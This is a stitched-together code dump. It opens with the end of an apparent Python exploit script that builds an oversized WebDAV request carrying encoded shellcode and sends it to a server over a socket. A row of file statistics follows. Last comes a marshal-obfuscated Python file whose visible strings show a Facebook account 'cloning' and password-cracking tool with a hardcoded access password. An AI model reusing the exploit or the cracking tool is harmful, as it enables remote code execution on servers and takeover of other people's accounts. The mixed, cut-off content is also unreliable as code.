pay+='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
pay+='>'
pay+=' (Not <locktoken:write1>) <http://localhost/bbbbbbb'
pay+='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'
shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'
pay+=shellcode
pay+='>\r\n\r\n'
print pay
sock.send(pay)
data = sock.recv(80960)
print data
sock.close
| 136.644444
| 2,184
| 0.771833
| 1,210
| 6,149
| 3.920661
| 0.175207
| 0.027825
| 0.020868
| 0.015177
| 0.094224
| 0.091062
| 0.072091
| 0.063238
| 0.063238
| 0.051855
| 0
| 0.236475
| 0.044072
| 6,149
| 45
| 2,185
| 136.644444
| 0.570602
| 0.054968
| 0
| 0
| 0
| 0.176471
| 0.944672
| 0.916803
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.058824
| null | null | 0.117647
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8258063f06ec3263078ad880d0386a9ccfb3b6b3
| 24,558
|
py
|
Python
|
India1.py
|
Sultandaku/India
|
7a6fad66fa13e2b7a4e6351a430896d8dba972b1
|
[
"Apache-2.0"
] | null | null | null |
India1.py
|
Sultandaku/India
|
7a6fad66fa13e2b7a4e6351a430896d8dba972b1
|
[
"Apache-2.0"
] | null | null | null |
India1.py
|
Sultandaku/India
|
7a6fad66fa13e2b7a4e6351a430896d8dba972b1
|
[
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9b(\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00@\x00\x00\x00s\xa3\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00e\x00\x00j\x0c\x00d\x02\x00\x83\x01\x00\x01xJ\x00e\r\x00d\x03\x00\x83\x01\x00D]<\x00Z\x0e\x00e\x04\x00j\x0f\x00d\x04\x00d\x05\x00\x83\x02\x00Z\x10\x00e\x11\x00d\x06\x00d\x07\x00\x83\x02\x00e\x01\x00_\x12\x00e\x10\x00GHe\x01\x00j\x12\x00j\x13\x00\x83\x00\x00\x01q\xaa\x00Wy\x10\x00d\x00\x00d\x01\x00l\x14\x00Z\x14\x00Wn\x1e\x00\x04e\x15\x00k\n\x00r\x1a\x01\x01\x01\x01e\x00\x00j\x0c\x00d\x08\x00\x83\x01\x00\x01n\x01\x00Xy\x10\x00d\x00\x00d\x01\x00l\x16\x00Z\x16\x00Wn8\x00\x04e\x15\x00k\n\x00re\x01\x01\x01\x01e\x00\x00j\x0c\x00d\t\x00\x83\x01\x00\x01e\x02\x00j\x17\x00d\n\x00\x83\x01\x00\x01e\x00\x00j\x0c\x00d\x0b\x00\x83\x01\x00\x01n\x01\x00Xd\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x14\x00Z\x14\x00d\x00\x00d\x01\x00l\x16\x00Z\x16\x00d\x00\x00d\x0c\x00l\x18\x00m\x19\x00Z\x19\x00\x01d\x00\x00d\r\x00l\x1a\x00m\x1b\x00Z\x1b\x00\x01d\x00\x00d\x0e\x00l\x16\x00m\x1c\x00Z\x1c\x00\x01e\x1d\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x1e\x00d\x0f\x00\x83\x01\x00\x01e\x16\x00j\x1c\x00\x83\x00\x00Z\x1f\x00e\x1f\x00j \x00e!\x00\x83\x01\x00\x01e\x1f\x00j"\x00e\x16\x00j#\x00j$\x00\x83\x00\x00d\x10\x00d\n\x00\x83\x01\x01\x01d.\x00g\x01\x00e\x1f\x00_%\x00d/\x00g\x01\x00e\x1f\x00_%\x00d\x15\x00\x84\x00\x00Z&\x00d\x16\x00\x84\x00\x00Z\'\x00d\x17\x00\x84\x00\x00Z(\x00d\x18\x00\x84\x00\x00Z)\x00d\x19\x00\x84\x00\x00Z*\x00d\x1a\x00Z+\x00g\x00\x00a,\x00g\x00\x00Z-\x00g\x00\x00a.\x00d\x1b\x00Z/\x00d\x1c\x00Z0\x00e\x00\x00j\x0c\x00d\x1d\x00\x83\x01\x00\x01d\x1e\x00GHd\x1f\x00Z1\x00d \x00Z2\x00d!\x00Z3\x00d"\x00Z4\x00xH\x00e4\x00d"\x00k\x02\x00r[\x03e5\x00d#\x00\x83\x01\x00Z6\x00e6\x00e3\x00k\x02\x00rF\x03d$\x00GHd%\x00Z4\x00q\x14\x03d&\x00GHe\x00\x00j\x0c\x00d\'\x00\x83\x01\x00\x01q\x14\x03Wd(\x00\x84\x00\x00Z7\x00d)\x00\x84\x00\x00Z8\x00d*\x00\x84\x00\x00Z9\x00d+\x00\x84\x00\x00Z:\x00d,\x00\x84\x00\x00Z;\x00e<\x00d-\x00k\x02\x00r\x9f\x03e8\x00\x83\x00\x00\x01n\x00\x00d\x01\x00S(0\x00\x00\x00i\xff\xff\xff\xffNs\x0b\x00\x00\x00rm -rf .txti\x10\'\x00\x00iG\xf4\x10\x00i\x7f\x96\x98\x00s\x04\x00\x00\x00.txtt\x01\x00\x00\x00as\x16\x00\x00\x00pip2 install mechanizes\x14\x00\x00\x00pip2 install requesti\x01\x00\x00\x00s\x17\x00\x00\x00Then type: python2 boss(\x01\x00\x00\x00t\n\x00\x00\x00ThreadPool(\x01\x00\x00\x00t\x0f\x00\x00\x00ConnectionError(\x01\x00\x00\x00t\x07\x00\x00\x00Browsert\x04\x00\x00\x00utf8t\x08\x00\x00\x00max_times\n\x00\x00\x00User-AgentsR\x00\x00\x00Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16s\n\x00\x00\x00user-agents\x1e\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]c\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00C\x00\x00\x00s\x16\x00\x00\x00d\x01\x00GHt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00Ns\x07\x00\x00\x00Thanks.(\x03\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x06\x00\x00\x00keluar"\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x05\x01c\x01\x00\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00sS\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00x:\x00t\x00\x00D]2\x00}\x03\x00|\x02\x00d\x03\x00|\x01\x00t\x01\x00j\x02\x00d\x04\x00t\x03\x00|\x01\x00\x83\x01\x00d\x05\x00\x18\x83\x02\x00\x19\x17|\x03\x00\x177}\x02\x00q\x13\x00Wt\x04\x00|\x02\x00\x83\x01\x00S(\x06\x00\x00\x00Nt\x07\x00\x00\x00ahtdzjct\x00\x00\x00\x00t\x01\x00\x00\x00!i\x00\x00\x00\x00i\x01\x00\x00\x00(\x05\x00\x00\x00t\x01\x00\x00\x00xt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintt\x03\x00\x00\x00lent\x05\x00\x00\x00cetak(\x04\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00wt\x01\x00\x00\x00dt\x01\x00\x00\x00i(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x04\x00\x00\x00acak\'\x00\x00\x00s\n\x00\x00\x00\x00\x01\x06\x01\x06\x01\r\x010\x02c\x01\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s~\x00\x00\x00d\x01\x00}\x01\x00xA\x00|\x01\x00D]9\x00}\x02\x00|\x01\x00j\x00\x00|\x02\x00\x83\x01\x00}\x03\x00|\x04\x00j\x01\x00d\x02\x00|\x02\x00\x16d\x03\x00t\x02\x00d\x04\x00|\x03\x00\x17\x83\x01\x00\x16\x83\x02\x00}\x04\x00q\r\x00W|\x04\x00d\x05\x007}\x04\x00|\x04\x00j\x01\x00d\x06\x00d\x05\x00\x83\x02\x00}\x04\x00t\x03\x00j\x04\x00j\x05\x00|\x04\x00d\x07\x00\x17\x83\x01\x00\x01d\x00\x00S(\x08\x00\x00\x00NR\n\x00\x00\x00s\x03\x00\x00\x00!%ss\x07\x00\x00\x00\x1b[%s;1mi\x1f\x00\x00\x00s\x04\x00\x00\x00\x1b[0ms\x02\x00\x00\x00!0s\x01\x00\x00\x00\n(\x06\x00\x00\x00t\x05\x00\x00\x00indext\x07\x00\x00\x00replacet\x03\x00\x00\x00strR\x07\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00write(\x05\x00\x00\x00R\x12\x00\x00\x00R\x13\x00\x00\x00R\x15\x00\x00\x00t\x01\x00\x00\x00jR\r\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR\x11\x00\x00\x000\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\x06\x01\r\x01\x0f\x01(\x02\n\x01\x12\x01c\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x00\x00\x00x<\x00|\x00\x00d\x01\x00\x17D]0\x00}\x01\x00t\x00\x00j\x01\x00j\x02\x00|\x01\x00\x83\x01\x00\x01t\x00\x00j\x01\x00j\x03\x00\x83\x00\x00\x01t\x04\x00j\x05\x00d\x02\x00\x83\x01\x00\x01q\x0b\x00Wd\x00\x00S(\x03\x00\x00\x00Ns\x01\x00\x00\x00\ng\xfc\xa9\xf1\xd2MbP?(\x06\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1b\x00\x00\x00t\x05\x00\x00\x00flusht\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x02\x00\x00\x00t\x01\x00\x00\x00zt\x01\x00\x00\x00e(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x05\x00\x00\x00jalan;\x00\x00\x00s\x08\x00\x00\x00\x00\x01\x11\x01\x10\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s\x1b\x00\x00\x00\r\x1b[1;93mPlease Wait \x1b[1;93mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x07\x00\x00\x00R\x1a\x00\x00\x00R\x1d\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x03\x00\x00\x00tikB\x00\x00\x00s\n\x00\x00\x00\x00\x02\x0f\x01\r\x01\x08\x01\r\x01i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\x05\x00\x00\x00clears\x8f\x01\x00\x00\x1b[1;92m---------------------Jogi---------------------\n\n\x1b[1;94m Creater : \x1b[1;92mJogi-Maharaja\n\x1b[1;94mFacebook: \x1b[1;92mJogiMaharaja\n\x1b[1;94mYoutube : \x1b[1;92mhttps://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-A\n\x1b[1;94mIts Not A Name Its Brand \x1b[1;92mJOGI\n\x1b[1;92mNo Login Need Enjoy without any problem\n\x1b[1;92mSpeed Commands Country code\n\n\x1b[1;92m-----------------Jogi-------------------------\ns\xa4\x01\x00\x00\n\\[1;92m---------------------Jogi------------------------------------------\n\n\x1b[1;94mCreater : \x1b[1;92mJogi-Maharaja\n\x1b[1;94mFacebook: \x1b[1;92mJogiMaharaja\n\x1b[1;94mYoutube : \x1b[1;92mhttps://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-A\n\x1b[1;94mIts Not A Name Its Brand \x1b[1;92mJOGI\n\x1b[1;92mNo Login Need Enjoy without any problem\n\x1b[1;92mSpeed Commands Country code\n\n\x1b[1;96m-----------------Jogi-------------------------\ns\x90\x01\x00\x00\n\x1b[1;92m\n---------------------Jogi---------------------\n\n\x1b[1;94mCreater : \x1b[1;92mJogi-Maharaja\n\x1b[1;94mFacebook: \x1b[1;92mJogiMaharaja\n\x1b[1;94mYoutube : \x1b[1;92mhttps://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-A\n\x1b[1;94mIts Not A Name Its Brand \x1b[1;92mJOGI\n\x1b[1;92mNo Login Need Enjoy without any problem\n\x1b[1;92mSpeed Commands Country code\n\n\x1b[1;96m-----------------Jogi-------------------------\nt\x04\x00\x00\x00jogit\x04\x00\x00\x00trues$\x00\x00\x00\x1b[1;92m[?] \x1b[1;97mPASSWORD \x1b[1;97m: s.\x00\x00\x00\n \x1b[1;92mCORRECT\n t\x05\x00\x00\x00falses\x0c\x00\x00\x00\x1b[1;92mWRONGsA\x00\x00\x00xdg-open https://www.youtube.com/channel/UCGEzNlT-HNPnVtAvUSJAY-Ac\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x18\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00\x83\x00\x00\x01d\x00\x00S(\x02\x00\x00\x00NR&\x00\x00\x00(\x03\x00\x00\x00R\x06\x00\x00\x00t\x06\x00\x00\x00systemt\x05\x00\x00\x00login(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatt\x07\x00\x00\x00lisensi`\x00\x00\x00s\x04\x00\x00\x00\x00\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s4\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHt\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01d\x04\x00GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR&\x00\x00\x00s+\x00\x00\x00\x1b[1;93m[1]\x1b[1;92mStart cloning ( no login )g\x9a\x99\x99\x99\x99\x99\xa9?s,\x00\x00\x00\x1b[1;93m[0]\x1b[1;92m Exit ( See You Later Bye )(\x06\x00\x00\x00R\x06\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00logo1R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x0b\x00\x00\x00pilih_login(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR+\x00\x00\x00e\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\r\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sA\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\x16\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\x00\x00S(\x05\x00\x00\x00Ns\x17\x00\x00\x00\n\x1b[1;92mCHOOSE: \x1b[1;95mR\x0b\x00\x00\x00s\x18\x00\x00\x00\x1b[1;92mFill In Correctlyt\x01\x00\x00\x001(\x03\x00\x00\x00t\t\x00\x00\x00raw_inputR.\x00\x00\x00t\x04\x00\x00\x00Zeek(\x01\x00\x00\x00t\x04\x00\x00\x00peak(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR.\x00\x00\x00n\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00sA\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHt\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01d\x04\x00GHt\x03\x00j\x04\x00d\x03\x00\x83\x01\x00\x01t\x05\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NR&\x00\x00\x00s\x19\x00\x00\x00\x1b[1;92m[1] Start Crackingg\x9a\x99\x99\x99\x99\x99\xa9?s\x17\x00\x00\x00\x1b[1;92m[0] \x1b[1;93m Back(\x06\x00\x00\x00R\x06\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1e\x00\x00\x00R\x1f\x00\x00\x00t\x06\x00\x00\x00action(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x0c\x00\x00\x00tahmid_rayatR1\x00\x00\x00w\x00\x00\x00s\x0e\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\r\x01\x05\x01\r\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00s\xd8\x01\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00r\xcf\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHd\x06\x00d\x07\x00\x17GHd\x08\x00GHyO\x00t\x00\x00d\t\x00\x83\x01\x00\x89\x00\x00d\n\x00\x89\x01\x00d\x0b\x00}\x01\x00x0\x00t\x05\x00|\x01\x00d\x0c\x00\x83\x02\x00j\x06\x00\x83\x00\x00D]\x19\x00}\x02\x00t\x07\x00j\x08\x00|\x02\x00j\t\x00\x83\x00\x00\x83\x01\x00\x01q\x84\x00WWq\xf1\x00\x04t\n\x00k\n\x00r\xcb\x00\x01\x01\x01d\r\x00GHt\x00\x00d\x0e\x00\x83\x01\x00\x01t\x0b\x00\x83\x00\x00\x01q\xf1\x00Xn"\x00|\x00\x00d\x0f\x00k\x02\x00r\xe5\x00t\x0c\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHt\r\x00t\x0e\x00t\x07\x00\x83\x01\x00\x83\x01\x00}\x03\x00t\x0f\x00d\x12\x00|\x03\x00\x17\x83\x01\x00\x01t\x0f\x00d\x13\x00\x88\x00\x00\x17\x83\x01\x00\x01t\x0f\x00d\x14\x00\x83\x01\x00\x01t\x0f\x00d\x15\x00\x83\x01\x00\x01d\x10\x00d\x16\x00\x14GH\x87\x00\x00\x87\x01\x00f\x02\x00d\x17\x00\x86\x00\x00}\x04\x00t\x10\x00d\x18\x00\x83\x01\x00}\x05\x00|\x05\x00j\x11\x00|\x04\x00t\x07\x00\x83\x02\x00\x01d\x10\x00d\x16\x00\x14GHd\x19\x00GHd\x1a\x00t\r\x00t\x0e\x00t\x12\x00\x83\x01\x00\x83\x01\x00\x17d\x1b\x00\x17t\r\x00t\x0e\x00t\x13\x00\x83\x01\x00\x83\x01\x00\x17GHd\x1c\x00GHt\x0f\x00d\x1d\x00\x83\x01\x00\x01d\x02\x00GHd\x